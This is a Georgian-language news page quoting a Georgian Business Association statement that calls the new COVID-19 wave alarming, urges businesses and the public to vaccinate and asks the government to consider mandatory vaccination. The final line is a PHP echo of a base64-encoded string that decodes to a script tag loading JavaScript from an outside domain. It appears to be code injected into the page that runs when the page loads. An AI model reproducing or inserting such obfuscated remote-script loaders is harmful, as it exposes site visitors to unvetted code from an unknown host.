celsiusi
ავერსი შნაიდერი
საქართველოს ბიზნეს ასოციაცია კოვიდპანდემიის მხრივ არსებულ მდგომარეობას ეხმიანება და მას, როგორც თითოეული მოქალაქისა და ქვეყნისთვის, ასევე ბიზნეს სექტორისთვის საგანგაშოდ მიიჩნევს.
 
ვაქცინაციის ტემპის ვარდნას თან დაერთო ახალი ტალღის დაწყება, რომელმაც საკმაოდ მაღალი ნიშნულებიდან აიღო სტარტი, რაც მეტად საგანგაშოა, როგორც ადამიანების ჯანმრთელობის შენარჩუნების მხრივ, ასევე ბიზნესისა და ქვეყნის ეკონომიკის მდგრადობისთვის. მიგვაჩნია, რომ საჭიროა მთელი ქვეყნის მობილიზაცია, რათა თავიდან ავიცილოთ ის სავალალო შედეგები, რომლის წინაშეც შესაძლოა დავდგეთ უმოკლეს დროში.
 
კიდევ ერთხელ მოვუწოდებთ ბიზნეს სექტორს და მასში დასაქმებულ ადამიანებს ვაქცინაციისკენ, ვინაიდან ეს არის პანდემიის დამარცხების ერთადერთი გზა. ახლა, როგორც არასდროს, საჭიროა ერთმანეთის თანადგომა და სოლიდარობა, რადგან საფრთხის წინაშეა არამხოლოდ ქვეყნის ეკონომიკა, არამედ ჩვენი შვილების ჯანმრთელობა და მათი მომავალი. დღეს, ჩვენ არ გვაქვს უფლება გამოვიჩინოთ უპასუხისმგებლობა ერთმანეთის მიმართ და უარი ვთქვათ ვაქცინაციაზე, ვინაიდან საქმე ეხება ჩვენი ქვეყნის მომავალ თაობას, მათ განათლებას, მათი კეთილდღეობის უზრუნველყოფას. აუცილებელია თითოეულმა ჩვენგანმა გამოვიჩინოთ მეტი პასუხისმგებლობა და ჩავერთოთ ამ კამპანიაში, რომელიც არის ცალსახად, ერთადერთი გზა პანდემიის დასრულებისა.
 
ახალი ტალღის რიცხობრივი დადებითობის მაჩვენებელი, რომელიც ტალღის საწყის ეტაპზე 10%-ს უახლოვდება იმდენად საგანგაშოა, რომ წინა პრაქტიკიდან გამომდინარე შესაძლებელია იმის პროგნოზირება, თუ როგორი შეზღუდვების წინაშე შეიძლება აღმოჩნდეს ბიზნეს სექტორი. სწორედ ამიტომ, მოვუწოდებთ კერძო სექტორში მოღვაწე კომპანიებს მეტი აქტიურობისკენ ვაქცინაციის ტემპების დაჩქარების მიზნით, ვინაიდან ამ პანდემიას არაერთი ბიზნეს ოპერატორი შეეწირა და ჩვენ მაქსიმალური უნდა შევეცადოთ, თავიდან ავიცილოთ ასეთი შედეგები.
 
კიდევ ერთხელ მოვუწოდებთ, როგორც ბიზნეს სექტორს და მასში დასაქმებულ ადამიანებს, ასევე სრულიად საქართველოს საზოგადოებას ვაქცინაციისკენ. არ შეიძლება დავიწყება იმისა, რომ პანდემიამ უამრავი ჩვენთვის საყვარელი ადამიანის სიცოცხლე უკვე შეიწირა.
 
ასევე მოვუწოდებთ ქვეყნის ხელისუფლებას, შეისწავლოს სხვადასხვა ქვეყნის გამოცდილება და პრაქტიკა პირდაპირი თუ ირიბი გზით სავალდებულო ვაქცინაციის შემოღების შესაძლებლობასთან დაკავშირებით. დღეს საჭირო და აუცილებელია ქმედითი, გაბედული და კონკრეტული ნაბიჯების გადადგმა ჩვენი საზოგადოებისა და ქვეყნის სასიკეთოდ“ - ნათქვამია საქართველოს ბიზნეს ასოციაციის განცხადებაში.
 
1019
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");